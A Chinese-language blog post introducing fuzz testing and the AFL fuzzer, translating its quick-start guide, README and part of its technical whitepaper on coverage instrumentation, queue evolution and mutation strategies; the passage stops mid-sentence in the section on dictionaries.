+    <content type="text"><![CDATA[接触这个词语已经有一年了，但还没有学习过更没有上手实践过，正好趁这个机会好好弄弄AFL。提起模糊测试，我们总会联想起这样或那样的专业术语——测试用例、代码覆盖率、执行路径等等，你可能和我一样一头雾水，这次我们就来看个明白 0x01 模糊测试首先，模糊测试（Fuzzing）是一种测试手段，它把系统看成一个摸不清内部结构的黑盒，只是向其输入接口随机地发送合法测试用例，这些用例并不是开发者所预期的输入，所以极有可能会造成系统的崩溃，通过分析崩溃信息，测试人员（黑客）就可以评估系统是否存在可利用的漏洞。模糊测试的过程，就好像是一个不断探测系统可以承受的输入极限的过程，让我想起学电子的时候对一个滤波器进行带宽的评估，如果我们知道内部电路原理，那么这个器件对于我们就是白盒了，可以直接通过公式计算理论带宽，现在系统对于我们而言是一个黑盒，我们通过在足够大频率范围内对其不断输入信号，就能测试出其实际带宽。 模糊测试方法一览 基于变种的Fuzzer 基于模板的Fuzzer 基于反馈演进的Fuzzer 基于追踪路径覆盖率 基于分支覆盖率 在已知合法的输入的基础上，对该输入进行随机变种或者依据某种经验性的变种，从而产生不可预期的测试输入。 此类Fuzzer工具的输入数据，依赖于安全人员结合自己的知识，给出输入数据的模板，构造丰富的输入测试数据。 此类Fuzzer会实时的记录当前对于目标程序测试的覆盖程度，从而调整自己的fuzzing输入。 PAP:路径编码的算法;后面会产生路径爆炸的问题 漏洞的爆发往往由于触发了非预期的分支 Taof, GPF, ProxyFuzz, Peach Fuzzer SPIKE, Sulley, Mu‐4000, Codenomicon AFL 0x02 AFL快速入门1）用make编译AFL。如果构建失败，请参阅docs / INSTALL以获取提示。2）查找或编写一个相当快速和简单的程序，该程序从文件或标准输入中获取数据，以一种有价值的方式处理它，然后干净地退出。如果测试网络服务，请将其修改为在前台运行并从stdin读取。在对使用校验和的格式进行模糊测试时，也要注释掉校验和验证码。遇到故障时，程序必须正常崩溃。注意自定义SIGSEGV或SIGABRT处理程序和后台进程。有关检测非崩溃缺陷的提示，请参阅docs/README中的第11节。3）使用afl-gcc编译要模糊的程序/库。一种常见的方法是：12$ CC = /path/to/afl-gcc CXX =/path/to/afl-g++ ./configure --disable-shared$ make clean all 如果程序构建失败，请联系 &#x61;&#x66;&#108;&#45;&#117;&#115;&#x65;&#114;&#x73;&#64;&#103;&#111;&#111;&#103;&#108;&#x65;&#x67;&#x72;&#111;&#117;&#112;&#x73;&#x2e;&#99;&#x6f;&#x6d;。4）获取一个对程序有意义的小而有效的输入文件。在模糊详细语法（SQL，HTTP等）时，也要创建字典，如dictionaries/README.dictionaries中所述。5）如果程序从stdin读取，则运行afl-fuzz，如下所示：./afl-fuzz -i testcase_dir -o findings_dir -- /path/to/tested/program [... program&#39;s cmdline ...] 如果程序从文件中获取输入，则可以在程序的命令行中输入@@; AFL会为您放置一个自动生成的文件名。 一些参考文档 docs/README - AFL的一般介绍，docs/perf_tips.txt - 关于如何快速模糊的简单提示，docs/status_screen.txt - UI中显示的花絮的解释，docs/parallel_fuzzing.txt - 关于在多个核上运行AFL的建议Generated test cases for common image formats - 生成图像文件测试用例的demoTechnical “whitepaper” for afl-fuzz - 技术白皮书 适用环境该工具已确认适用于32位和64位的x86 Linux，OpenBSD，FreeBSD和NetBSD。 它也适用于MacOS X和Solaris，但有一些限制。 它支持用C，C ++或Objective C编写的程序，使用gcc或clang编译。 在Linux上，可选的QEMU模式也允许对黑盒二进制文件进行模糊测试。 AFL的变体和衍生物允许您模糊Python，Go，Rust，OCaml，GCJ Java，内核系统调用，甚至整个虚拟机。 还有一个密切启发的进程模糊器，它在LLVM中运行，并且是一个在Windows上运行的分支。 最后，AFL是OSS-Fuzz背后的模糊引擎之一。 哦 - 如果你安装了gnuplot，你可以使用afl-plot来获得漂亮的进度图。 0x03 AFL特点 非常复杂。它是一种插桩器（instrumentation）引导的遗传模糊器，能够在各种非平凡的目标中合成复杂的文件语义，减少了对专用的语法识别工具的需求。它还带有一个独特的崩溃浏览器，一个测试用例最小化器，一个故障触发分配器和一个语法分析器 - 使评估崩溃错误的影响变得简单。 智能。它围绕一系列经过精心研究，高增益的测试用例预处理和模糊测试策略而构建，在其他模糊测试框架中很少采用与之相当的严格性。结果，它发现了真正的漏洞。 它很快。由于其低级编译时间或仅二进制检测和其他优化，该工具提供了针对常见现实世界目标的近原生或优于原生的模糊测试速度。新增的持久模式允许在最少的代码修改的帮助下，对许多程序进行异常快速的模糊测试。 可以链接到其他工具。模糊器可以生成优质，紧凑的测试语料库，可以作为更专业，更慢或劳动密集型流程和测试框架的种子。它还能够与任何其他软件进行即时语料库同步。 0x04 AFL README Written and maintained by Michal Zalewski &#108;&#x63;&#x61;&#109;&#116;&#117;&#x66;&#64;&#x67;&#x6f;&#111;&#103;&#108;&#101;&#46;&#99;&#x6f;&#x6d; Copyright 2013, 2014, 2015, 2016 Google Inc. All rights reserved. Released under terms and conditions of Apache License, Version 2.0. For new versions and additional information, check out: http://lcamtuf.coredump.cx/afl/ To compare notes with other users or get notified about major new features, send a mail to &#97;&#x66;&#x6c;&#x2d;&#x75;&#115;&#x65;&#x72;&#x73;&#43;&#x73;&#117;&#98;&#115;&#x63;&#114;&#x69;&#98;&#101;&#64;&#103;&#111;&#x6f;&#x67;&#x6c;&#x65;&#103;&#x72;&#x6f;&#x75;&#x70;&#115;&#46;&#x63;&#x6f;&#109;. See QuickStartGuide.txt if you don’t have time to read this file. 1）具有导向性的模糊测试的挑战Fuzzing是用于识别真实软件中的安全问题的最强大且经过验证的策略之一;它负责安全关键软件中迄今为止发现的绝大多数远程代码执行和权限提升漏洞。不幸的是，模糊测试也不够有力。盲目的、随机的变异使得它不太可能在测试代码中达到某些代码路径，从而使一些漏洞超出了这种技术的范围。已经有许多尝试来解决这个问题。早期方法之一 - 由Tavis Ormandy开创 - 是一种 语义库蒸馏（corpus distillation） 。网上找到的一些大型语料库中往往包含大量的文件，这时就需要对其精简，该方法依赖于覆盖信号从大量高质量的候选文件语料库中选择有趣种子的子集，然后通过传统方式对其进行模糊处理。该方法非常有效，但需要这样的语料库随时可用。正因为如此，代码覆盖率 也只是衡量程序执行状态的一个简单化的度量，这种方式并不适合后续引导fuzzing测试的。其他更复杂的研究集中在诸如 程序流分析（“concoic execution”），符号执行或静态分析 等技术上。所有这些方法在实验环境中都非常有前景，但在实际应用中往往会遇到可靠性和性能问题 - 部分高价值的程序都有非常复杂的内部状态和执行路径，在这一方面符号执行和concolic技术往往会显得不够健壮（如路径爆炸问题），所以仍然稍逊于传统的fuzzing技术。 2）afl-fuzz方法American Fuzzy Lop是一种暴力模糊测试，配有极其简单但坚如磐石的 引导遗传算法 。它使用修改后的边覆盖率，轻松地获取程序控制流程的细微局部变化。简化一下，整体算法可以概括为： 1）将用户提供的初始测试用例加载到队列中， 2）从队列中获取下一个输入文件， 3）尝试将测试用例修剪到不会改变程序测量行为的最小尺寸， 4）使用平衡且经过充分研究的各种传统模糊测试策略反复改变文件， 5）如果任何生成的编译导致由instrumentation记录的新状态转换，则将变异输出添加为队列中的新条目。 6）转到2。 发现的测试用例也会定期被淘汰，以消除那些被更新，更高覆盖率的发现所淘汰的测试用例。并经历其他几个插桩驱动（instrumentation-driven）的努力最小化步骤。作为模糊测试过程的一个副作用，该工具创建了一个小型，独立的有趣测试用例集。这些对于播种其他劳动力或资源密集型测试方案非常有用 - 例如，用于压力测试浏览器，办公应用程序，图形套件或闭源工具。该模糊器经过全面测试，可提供远远优于盲目模糊或仅覆盖工具的开箱即用性能。 3）用于AFL的插桩（instrumentation）程序当源代码可用时，可以通过配套工具 注入instrumentation ，该工具可作为第三方代码的任何标准构建过程中gcc或clang的替代品。instrumentation具有相当适度的性能影响;与afl-fuzz实现的其他优化相结合，大多数程序可以像传统工具一样快速或甚至更快地进行模糊测试。 重新编译目标程序 的正确方法可能会有所不同，具体取决于构建过程的具体情况，但几乎通用的方法是：123$ CC = /path/to/afl/afl-gcc ./configure$ make clean all对于C ++程序，您还需要将CXX = / path /设置为/ afl / afl g ++。 clang组件（afl-clang和afl-clang ++）可以以相同的方式使用; clang用户也可以选择利用更高性能的检测模式，如llvm_mode / README.llvm中所述。 在测试库时，您需要查找或编写一个简单的程序，该程序从stdin或文件中读取数据并将其传递给测试的库。在这种情况下，必须 将此可执行文件与已检测库的静态版本相链接 ，或者确保在运行时加载正确的.so文件（通常通过设置LD_LIBRARY_PATH）。最简单的选项是 静态构建 ，通常可以通过以下方式实现：1$ CC = /path/to/afl/afl-gcc ./configure --disable-shared 调用make时设置AFL_HARDEN = 1将导致CC组件自动启用代码强化选项，以便更容易检测到简单的内存错误。 Libdislocator，AFL附带的帮助程序库（请参阅libdislocator / README.dislocator）也可以帮助发现堆损坏问题。PS。建议ASAN用户查看notes_for_asan.txt文件以获取重要警告。 4）检测仅二进制应用程序当源代码为不可得时，afl为黑盒二进制文件的快速、即时检测提供实验支持。 这是通过在较不为人知的“用户空间仿真”模式下运行的QEMU版本来实现的。QEMU是一个独立于AFL的项目，但您可以通过以下方式方便地构建该功能：12$ cd qemu_mode$ ./build_qemu_support.sh 有关其他说明和注意事项，请参阅qemu_mode / README.qemu。该模式比编译时插桩（instrumentation）慢约2-5倍，对并行化的兼容较差，并且可能有一些其他的不同。 5）选择初始测试用例为了正确操作，模糊器需要一个或多个起始文件，其中包含目标应用程序通常所需的输入数据的良好示例。 有两个基本规则： 测试用例足够小。 1 kB以下是理想的，尽管不是绝对必要的。 有关大小重要性的讨论，请参阅perf_tips.txt。 只有在功能上彼此不同时才使用多个测试用例。 使用五十张不同的度假照片来模糊图像库是没有意义的。您可以在此工具附带的testcases/子目录中找到许多启动文件的好例子。PS。 如果有大量数据可用于筛选，您可能希望使用afl-cmin实用程序来识别在目标二进制文件中使用不同代码路径的功能不同的文件的子集。 6）模糊测试二进制文件测试过程本身由afl-fuzz实用程序执行。该程序需要一个带有初始测试用例的只读目录，一个存储其输出结果的独立位置，以及要测试的二进制文件的路径。对于直接从 stdin 接受输入的目标二进制文件，通常的语法是：1$ ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program [... params ...] 对于从 文件 中获取输入的程序，使用“@@”标记目标命令行中应放置输入文件名的位置。模糊器将替换为您：1$ ./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ 您还可以使用-f选项将变异数据写入特定文件。如果程序需要特定的文件扩展名，那么这很有用。非插桩二进制文件可以在QEMU模式下（在命令行中添加-Q）或在传统的盲目模糊模式（指定-n）中进行模糊测试。您可以使用-t和-m覆盖已执行进程的默认超时和内存限制;perf_tips.txt中讨论了优化模糊测试性能的技巧。 请注意，afl-fuzz首先执行一系列确定性模糊测试步骤，这可能需要几天时间，但往往会产生整齐的测试用例。如果你想要快速结果 - 类似于zzuf和其他传统的模糊器 - 在命令行中添加-d选项。 7）解释输出有关如何解释显示的统计信息以及监视进程运行状况的信息，请参阅status_screen.txt文件。请务必查阅此文件，尤其是如果任何UI元素以红色突出显示。模糊过程将持续到按Ctrl-C为止。至少，您希望允许模糊器完成一个队列周期，这可能需要几个小时到一周左右的时间。在输出目录中创建了三个子目录并实时更新： 队列queue/ - 测试每个独特执行路径的案例，以及用户提供的所有起始文件。这是第2节中提到的合成语料库。在将此语料库用于任何其他目的之前，您可以使用afl-cmin工具将其缩小到较小的大小。该工具将找到一个较小的文件子集，提供相同的边缘覆盖。 崩溃crash/ - 导致被测程序接收致命信号的独特测试用例（例如，SIGSEGV，SIGILL，SIGABRT）。条目按接收信号分组。 挂起hang/ - 导致测试程序超时的独特测试用例。将某些内容归类为挂起之前的默认时间限制是1秒内的较大值和-t参数的值。可以通过设置AFL_HANG_TMOUT来微调该值，但这很少是必需的。崩溃和挂起被视为“唯一” “如果相关的执行路径涉及在先前记录的故障中未见的任何状态转换。如果可以通过多种方式达到单个错误，那么在此过程中会有一些计数通货膨胀，但这应该会迅速逐渐减少。 崩溃和挂起的文件名与父、非错误的队列条目相关联。这应该有助于调试。如果无法重现 afl-fuzz 发现的崩溃，最可能的原因是您没有设置与工具使用的内存限制相同的内存限制。尝试：12$ LIMIT_MB = 50$（ulimit -Sv $ [LIMIT_MB &lt;&lt; 10]; /path/to/tested_binary ...） 更改LIMIT_MB以匹配传递给afl-fuzz的-m参数。在OpenBSD上，也将-Sv更改为-Sd。任何现有的输出目录也可用于恢复中止的作业;尝试：$ ./afl-fuzz -i-o_ existing_output_dir [...etc...]如果安装了gnuplot，您还可以使用afl-plot为任何活动的模糊测试任务生成一些漂亮的图形。有关如何显示的示例，请参阅 http://lcamt​​uf.coredump.cx/afl/plot/ 。 8）并行模糊测试每个afl-fuzz的实例大约占用一个核。 这意味着在多核系统上，并行化是充分利用硬件所必需的。有关如何在多个核心或多个联网计算机上模糊常见目标的提示，请参阅parallel_fuzzing.txt。并行模糊测试模式 还提供了一种简单的方法，用于将AFL连接到其他模糊器，动态符号执行（concrete and symbolic， concolic execution）引擎等等; 再次，请参阅 parallel_fuzzing.txt的最后一节以获取提示。 9）Fuzzer词典默认情况下，afl-fuzz变异引擎针对紧凑数据格式进行了优化 - 例如，图像，多媒体，压缩数据，正则表达式语法或shell脚本。它有点不太适合具有特别冗长和冗余的语言的语言 - 特别是包括HTML，SQL或JavaScript。为了避免构建语法感知工具的麻烦，afl-fuzz提供了一种方法，使用与目标数据类型相关联的其他特殊标记的语言关键字，魔术头或可选字典为模糊测试过程设定种子，并使用它来重建底层随时随地的语法：http://lcamt​​uf.blogspot.com/2015/01/afl-fuzz-making-up-grammar-with.html要使用此功能，首先需要使用dictionaries/README.dictionaries中讨论的两种格式之一创建字典;然后通过命令行中的-x选项将模糊器指向它。（该子目录中也已提供了几个常用字典。）没有办法提供基础语法的更多结构化描述，但模糊器可能会根据instrumentation反馈单独找出一些。这实际上在实践中有效，比如说：http://lcamt​​uf.blogspot.com/2015/04/finding-bugs-in-sqlite-easy-way.htmlPS。即使没有给出明确的字典，afl-fuzz也会尝试通过在确定性字节翻转期间非常接近地观察instrumentation来提取输入语料库中的现有语法标记。这适用于某些类型的解析器和语法，但不如-x模式好。如果字典真的很难找到，另一个选择是让AFL运行一段时间，然后使用作为AFL伴随实用程序的令牌捕获库。为此，请参阅libtokencap/README.tokencap。 10）崩溃分类基于coverage的崩溃分组通常会生成一个小型数据集，可以手动或使用非常简单的GDB或Valgrind脚本快速进行分类。每次崩溃都可以追溯到队列中的父级非崩溃测试用例，从而更容易诊断故障。话虽如此，重要的是要承认，如果没有大量的调试和代码分析工作，一些模糊的崩溃很难快速评估可利用性。为了帮助完成这项任务，afl-fuzz支持使用-C标志启用的非常独特的“崩溃探索”模式。在此模式下，模糊器将一个或多个崩溃测试用例作为输入，并使用其反馈驱动的模糊测试策略，非常快速地枚举程序中可以达到的所有代码路径，同时使其保持在崩溃状态。不会导致崩溃的变异会被拒绝;任何不影响执行路径的更改也是如此。输出是一个小文件集，可以非常快速地检查以查看攻击者对错误地址的控制程度，或者是否有可能超过初始越界读取，并查看下面的内容。 哦，还有一件事：对于测试用例最小化，请尝试afl-tmin。该工具可以以非常简单的方式操作：$ ./afl-tmin -i test_case -o minimize_result - /path/to/program [...] 该工具适用于崩溃和非崩溃的测试用例。在崩溃模式下，它将很乐意接受 instrumented 和 non-instrumented 的二进制文件。在非崩溃模式下，最小化器依赖于标准AFL检测来使文件更简单而不改变执行路径。minimizer与afl-fuzz兼容的方式接受-m，-t，-f和@@语法。如果指定了参数-x，即crash mode，会把导致程序非正常退出的文件直接剔除。 AFL的另一个新成员是afl-analyze工具。需要输入文件，尝试按顺序翻转字节，并观察测试程序的行为。然后根据哪些部分看起来是关键的，哪些部分不是关键的，对输入进行颜色编码;虽然不是万能，但它通常可以提供对复杂文件格式的快速见解。有关其操作的更多信息可以在technical_details.txt的末尾找到。 11）超越崩溃模糊测试是一种很好的，未充分利用的技术，用于发现非崩溃的设计和实现错误。通过修改目标程序调用abort()时发现了一些有趣的错误，比如： 当给出相同的模糊输入时，两个bignum库产生不同的输出， 当要求连续多次解码相同的输入图像时，图像库会产生不同的输出， 在对模糊提供的数据进行迭代序列化和反序列化时，序列化/反序列化库无法生成稳定的输出， 当要求压缩然后解压缩特定blob时，压缩库会生成与输入文件不一致的输出。实施这些或类似的健全性检查通常只需要很少的时间;如果你是特定包的维护者，你可以使用#ifdef FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION（一个也与libfuzzer共享的标志）或#ifdef __AFL_COMPILER（这个只适用于AFL）来使这个代码成为条件。 12）常识性风险请记住，与许多其他计算密集型任务类似，模糊测试可能会给您的硬件和操作系统带来压力。特别是： 你的CPU会很热，需要充分冷却。在大多数情况下，如果冷却不足或停止正常工作，CPU速度将自动受到限制。也就是说，尤其是在不太合适的硬件（笔记本电脑，智能手机等）上进行模糊测试时，某些事情并非完全不可能爆发。 有针对性的程序可能最终不正常地抓取千兆字节的内存或用垃圾文件填满磁盘空间。 AFL试图强制执行基本的内存限制，但不能阻止每一个可能的事故。最重要的是，您不应该对数据丢失前景不可接受的系统进行模糊测试。 模糊测试涉及数十亿次对文件系统的读写操作。在现代系统中，这通常会被高度缓存，导致相当适度的“物理”I/O - 但是有许多因素可能会改变这个等式。您有责任监控潜在的问题; I / O非常繁重，许多HDD和SSD的使用寿命可能会缩短。监视Linux上磁盘I/O的一种好方法是’iostat’命令：$ iostat -d 3 -x -k [...可选磁盘ID ...] 13）已知的限制和需要改进的领域以下是AFL的一些最重要的警告： AFL通过检查由于信号（SIGSEGV，SIGABRT等）而导致的第一个衍生过程死亡来检测故障。为这些信号安装自定义处理程序的程序可能需要注释掉相关代码。同样，由模糊目标产生的子处理中的故障可能会逃避检测，除非您手动添加一些代码来捕获它。 与任何其他强力工具一样，如果使用加密，校验和，加密签名或压缩来完全包装要测试的实际数据格式，则模糊器提供有限的覆盖范围。要解决这个问题，你可以注释掉相关的检查（参见experimental / libpng_no_checksum /获取灵感）;如果这是不可能的，你也可以编写一个后处理器，如experimental / post_library /中所述。 ASAN和64位二进制文​​件存在一些不幸的权衡。这不是因为任何特定的模糊错误;请参阅notes_for_asan.txt以获取提示。 没有直接支持模糊网络服务，后台守护程序或需要UI交互才能工作的交互式应用程序。您可能需要进行简单的代码更改，以使它们以更传统的方式运行。 Preeny也可以提供一个相对简单的选项 - 请参阅：https://github.com/zardus/preeny有关修改基于网络的服务的一些有用提示也可以在以下位置找到：https://www.fastly.com/blog/how-to-fuzz-server-american-fuzzy-lop AFL不输出人类可读的覆盖数据。如果你想监控覆盖，请使用Michael Rash的afl-cov：https：//github.com/mrash/afl-cov 偶尔，敏感的机器会对抗他们的创造者。如果您遇到这种情况，请访问http://lcamt​​uf.coredump.cx/prep/。除此之外，请参阅安装以获取特定于平台的提示。 0x05 afl-fuzz白皮书本文档提供了American Fuzzy Lop的简单的概述。想了解一般的使用说明，请参见 README 。想了解AFL背后的动机和设计目标，请参见 historical_notes.txt。 0）设计说明(Design statement)American Fuzzy Lop 不关注任何单一的操作规则(singular principle of operation)，也不是一个针对任何特定理论的概念验证(proof of concept)。这个工具可以被认为是一系列在实践中测试过的hacks行为，我们发现这个工具惊人的有效。我们用目前最simple且最robust的方法实现了这个工具。唯一的设计宗旨在于速度、可靠性和易用性。 1）覆盖率计算(Coverage measurements)在编译过的程序中插桩能够捕获分支（边缘）的覆盖率，并且还能检测到粗略的分支执行命中次数(branch-taken hit counts)。在分支点注入的代码大致如下： 123cur_location = &lt;COMPILE_TIME_RANDOM&gt;; //用一个随机数标记当前基本块shared_mem[cur_location ^ prev_location]++; //将当前块和前一块异或保存到shared_mem[]prev_location = cur_location &gt;&gt; 1; //cur_location右移1位区分从当前块到当前块的转跳 cur_location 的值是随机产生的，为的是简化连接复杂对象的过程和保持XOR输出分布是均匀的。shared_mem[] 数组是一个调用者 (caller) 传给被插桩的二进制程序的64kB的共享空间。其中的每一字节可以理解成对于插桩代码中特别的元组(branch_src, branch_dst)的一次命中（hit）。选择这个数组大小的原因是让冲突(collisions)尽可能减少。这样通常能处理2k到10k的分支点。同时，它的大小也足以使输出图能在接受端达到毫秒级的分析。 Branch cnt Colliding tuples Example targets 1,000 0.75% giflib, lzo 2,000 1.5% zlib, tar, xz 5,000 3.5% libpng, libwebp 10,000 7% libxml 20,000 14% sqlite 50,000 30% - 这种形式的覆盖率，相对于简单的基本块覆盖率来说，对程序运行路径提供了一个更好的描述(insight)。特别地，它能很好地区分以下两个执行路径： A -&gt; B -&gt; C -&gt; D -&gt; E (tuples: AB, BC, CD, DE) A -&gt; B -&gt; D -&gt; C -&gt; E (tuples: AB, BD, DC, CE) 这有助于发现底层代码的微小错误条件。因为 安全漏洞通常是一些非预期(或不正确)的语句转移(一个tuple就是一个语句转移) ，而不是没覆盖到某块代码。上边伪代码的最后一行移位操作是为了让tuple具有定向性(没有这一行的话，A^B和B^A就没区别了，同样，A^A和B^B也没区别了)。采用右移的原因跟Intel CPU的一些特性有关。 2）发现新路径(Detecting new behaviors)AFL的fuzzers使用一个全局Map来存储之前执行时看到的tuple。这些数据可以被用来对不同的trace进行快速对比，从而可以计算出是否新执行了一个dword指令/一个qword-wide指令/一个简单的循环。当一个变异的输入产生了一个包含新tuple的执行路径时，对应的输入文件就被保存，然后被发送到下一过程(见第3部分)。对于那些没有产生新路径的输入，就算他们的instrumentation输出模式是不同的，也会被抛弃掉。这种算法考虑了一个非常细粒度的、长期的对程序状态的探索，同时它还不必执行复杂的计算，不必对整个复杂的执行流进行对比，也避免了路径爆炸的影响。为了说明这个算法是怎么工作的，考虑下面的两个路径，第二个路径出现了新的tuples(CA, AE):12#1: A -&gt; B -&gt; C -&gt; D -&gt; E#2: A -&gt; B -&gt; C -&gt; A -&gt; E 因为#2的原因，以下的路径就不认为是不同的路径了，尽管看起来非常不同：#3: A -&gt; B -&gt; C -&gt; A -&gt; B -&gt; C -&gt; A -&gt; B -&gt; C -&gt; D -&gt; E 除了检测新的tuple之外，AFL的fuzzer也会粗略地记录tuple的命中数(hit counts)。这些被分割成几个buckets：1, 2, 3, 4-7, 8-15, 16-31, 32-127, 128+ 从某种意义来说，buckets里边的数目是有实际意义的：它是一个8-bit counter和一个8-position bitmap的映射。8-bit counter是由桩生成的，8-position bitmap则依赖于每个fuzzer记录的已执行的tuple的命中数。单个bucket的改变会被忽略掉: 在程序控制流中，bucket的转换会被标记成一个interesting change，传入evolutionary(见第三部分)进行处理。通过命中次数(hit count)，我们能够分辨控制流是否发生变化。例如一个代码块被执行了两次，但只命中了一次。并且这种方法对循环的次数不敏感(循环47次和48次没区别)。这种算法通过限制内存和运行时间来保证效率。 另外，算法通过设置执行超时，来避免效率过低的fuzz。从而进一步发现效率比较高的fuzz方式。 3）输入队列的进化(Evolving the input queue)经变异的测试用例，会使程序产生 新的状态转移 。这些测试用例稍后被添加到 input 队列中，用作下一个 fuzz 循环。它们补充但不替换现有的发现。这种算法允许工具可以持续探索不同的代码路径，即使底层的数据格式可能是完全不同的。如下图： 这里有一些这种算法在实际情况下例子： pulling-jpegs-out-of-thin-air afl-fuzz-nobody-expects-cdata-sections 这种过程下产生的语料库基本上是这些输入文件的集合：它们都能触发一些新的执行路径。产生的语料库，可以被用来作为其他测试的种子。使用这种方法，大多数目标程序的队列会增加到大概1k到10k个entry。大约有10-30%归功于对新tupe的发现，剩下的和hit counts改变有关。下表比较了不同 fuzzing 方法在发现文件句法(file syntax)和探索程序执行路径的能力。插桩的目标程序是 GNU patch 2.7.3 compiled with -O3 and seeded with a dummy text file: Fuzzer guidance strategy used Blocks reached Edges reached Edge hit cnt var Highest-coverage test case generated (Initial file) 156 163 1.00 (none) Blind fuzzing S 182 205 2.23 First 2 B of RCS diff Blind fuzzing L 228 265 2.23 First 4 B of -c mode diff Block coverage 855 1,130 1.57 Almost-valid RCS diff Edge coverage 1,452 2,070 2.18 One-chunk -c mode diff AFL model 1,765 2,597 4.99 Four-chunk -c mode diff 第一行的blind fuzzing (“S”)代表仅仅执行了一个回合的测试。第二行的Blind fuzzing L表示在一个循环中执行了几个回合的测试，但是没有进行改进。和插桩运行相比，需要更多时间全面处理增长队列。 在另一个独立的实验中也取得了大致相似的结果。在新实验中，fuzzer被修改成所有随机fuzzing 策略，只留下一系列基本、连续的操作，例如位反转(bit flips)。因为这种模式（mode）将不能改变输入文件的的大小，会话使用一个合法的合并格式（unified diff）作为种子。 Queue extension strategy used Blocks reached Edges reached Edge hit cnt var Number of unique crashes found (Initial file) 624 717 1.00 - Blind fuzzing 1,101 1,409 1.60 0 Block coverage 1,255 1,649 1.48 0 Edge coverage 1,259 1,734 1.72 0 AFL model 1,452 2,040 3.16 1 在之前提到的基于遗传算法的fuzzing，是通过一个test case的进化(这里指的是用遗传算法进行变异)来实现最大覆盖。在上述实验看来，这种“贪婪”的方法似乎没有为盲目的模糊策略带来实质性的好处。 4）语料筛选（Culling the corpus）上文提到的渐进式语句探索路径的方法意味着：假设A和B是测试用例(test cases)，且B是由A变异产生的。那么测试用例B达到的边缘覆盖率(edge coverage)是测试用例A达到的边缘覆盖率的严格超集(superset)。为了优化fuzzing，AFL会用一个快速算法周期性的重新评估(re-evaluates)队列，这种算法会选择队列的一个更小的子集，并且这个子集仍能覆盖所有的tuple。算法的这个特性对这个工具特别有利(favorable)。算法通过指定每一个队列入口(queue entry)，根据执行时延（execution latency）和文件大小分配一个分值比例（score proportional）。然后为每一个tuple选择最低分值的entry。这些tuples按下述流程进行处理： 12345671) Find next tuple not yet in the temporary working set,2) Locate the winning queue entry for this tuple,3) Register *all* tuples present in that entry&apos;s trace in the working set,4) Go to #1 if there are any missing tuples in the set. “favored” entries 产生的语料，会比初始的数据集小5到10倍。没有被选择的也没有被扔掉，而是在遇到下列对队列时，以一定概率略过：12345678- If there are new, yet-to-be-fuzzed favorites present in the queue, 99% of non-favored entries will be skipped to get to the favored ones.- If there are no new favorites:- If the current non-favored entry was fuzzed before, it will be skipped 95% of the time.- If it hasn&apos;t gone through any fuzzing rounds yet, the odds of skipping drop down to 75%. 基于以往的实验经验，这种方法能够在队列周期速度(queue cycling speed)和测试用例多样性(test case diversity)之间达到一个合理的平衡。使用afl-cmin工具能够对输入或输出的语料库进行稍微复杂但慢得多的的处理。这一工具将永久丢弃冗余entries，产生适用于afl-fuzz或者外部工具的更小的语料库。 5）输入文件修剪（Trimming input files）文件的大小对fuzzing的性能有着重大影响(dramatic impact)。因为大文件会让目标二进制文件运行变慢；大文件还会减少变异触及重要格式控制结构(format control structures)的可能性(我们希望的是变异要触及冗余代码块(redundant data blocks))。这个问题将在perf_tips.txt细说。用户可能提供低质量初始语料(starting corpus)，某些类型的变异会迭代地增加生成文件的大小。所以要抑制这种趋势(counter this trend)。幸运的是，插桩反馈(instrumentation feedback)提供了一种简单的方式自动削减（trim down）输入文件，并确保这些改变能使得文件对执行路径没有影响。afl-fuzz内置的修剪器(trimmer)使用变化的长度和步距(variable length and stepover)来连续地(sequentially)删除数据块；任何不影响trace map的校验和(checksum)的删除块将被提交到disk。这个修剪器的设计并不算特别地周密(thorough)，相反地，它试着在精确度(precision)和进程调用execve()的次数之间选取一个平衡，找到一个合适的block size和stepover。平均每个文件将增大约5-20%。独立的afl-tmin工具使用更完整(exhaustive)、迭代次数更多(iteractive)的算法，并尝试对被修剪的文件采用字母标准化的方式处理。 6) 模糊测试策略(Fuzzing strategies)插桩提供的反馈(feedback)使得我们更容易理解各种不同fuzzing策略的价值，从而优化(optimize)他们的参数。使得他们对不同的文件类型都能同等地进行工作。afl-fuzz用的策略通常是与格式无关（format-agnostic），详细说明在下边的连接中：binary-fuzzing-strategies-what-works值得注意的一点是，afl-fuzz大部分的(尤其是前期的)工作都是高度确定的(highly deterministic)，随机性修改和测试用例拼接(random stacked modifications和test case splicing)只在后期的部分进行。 确定性的策略 包括：12345- Sequential bit flips with varying lengths and stepovers,使用变化的长度和步距来连续进行位反转- Sequential addition and subtraction of small integers,对小的整型数来连续进行加法和减法- Sequential insertion of known interesting integers (0, 1, INT_MAX, etc),对已知的感兴趣的整型数连续地插入 使用这些确定步骤的目的在于，生成紧凑的(compact)测试用例，以及在产生non-crashing的输入和产生crashing的输入之间，有很小的差异(small diffs)。非确定性(non-deterministic)策略 的步骤包括：stacked bit flips、插入(insertions)、删除(deletions)、算数(arithmetics)和不同测试用例之间的拼接(splicing)。 由于在historical_notes.txt 中提到的原因(性能、简易性、可靠性)，AFL通常不试图去推断某个特定的变异(specific mutations)和程序状态(program states)的关系。 fuzzing的步骤名义上来说是盲目的(nominally blind)，只被输入队列的进化方式的设计所影响(见第三部分)。 这意味着，这条规则有一个例外：当一个新的队列条目，经过初始的确定性fuzzing步骤集合时，并且文件的部分区域被观测到对执行路径的校验和没有影响，这些队列条目在接下来的确定性fuzzing阶段可能会被排除。尤其是对那些冗长的数据格式，这可以在保持覆盖率不变的情况下，减少10-40%的执行次数。在一些极端情况下，比如一些block-aligned的tar文件，这个数字可以达到90%。 7) 字典(Dictionaries)插桩提供的反馈能够让它自动地识别出一些输入文件中的语法(syntax)符号(tokens)，并且能够为测试器(tested parser)检测到一些组合，这些组合是由预定义(predefined)的或自动检测到的(auto-detected)字典项(dictionary terms)构成的合法语法(valid grammar)。关于这些特点在afl-fuzz是如何实现的，可以看一下这个链接：afl-fuzz-making-up-grammar-with大体上，当基本的(basic, typically easily-obtained)句法(syntax)符号(tokens)以纯粹随机的方式组合在一起时，插桩和队列进化这两种方法共同提供了一种反馈机制，这种反馈机制能够区分无意义的变异和在插桩代码中触发新行为的变异。这样能增量地构建更复杂的句法(syntax)。这样构建的字典能够让fuzzer快速地重构非常详细(highly verbose)且复杂的(complex)语法，比如JavaScript, 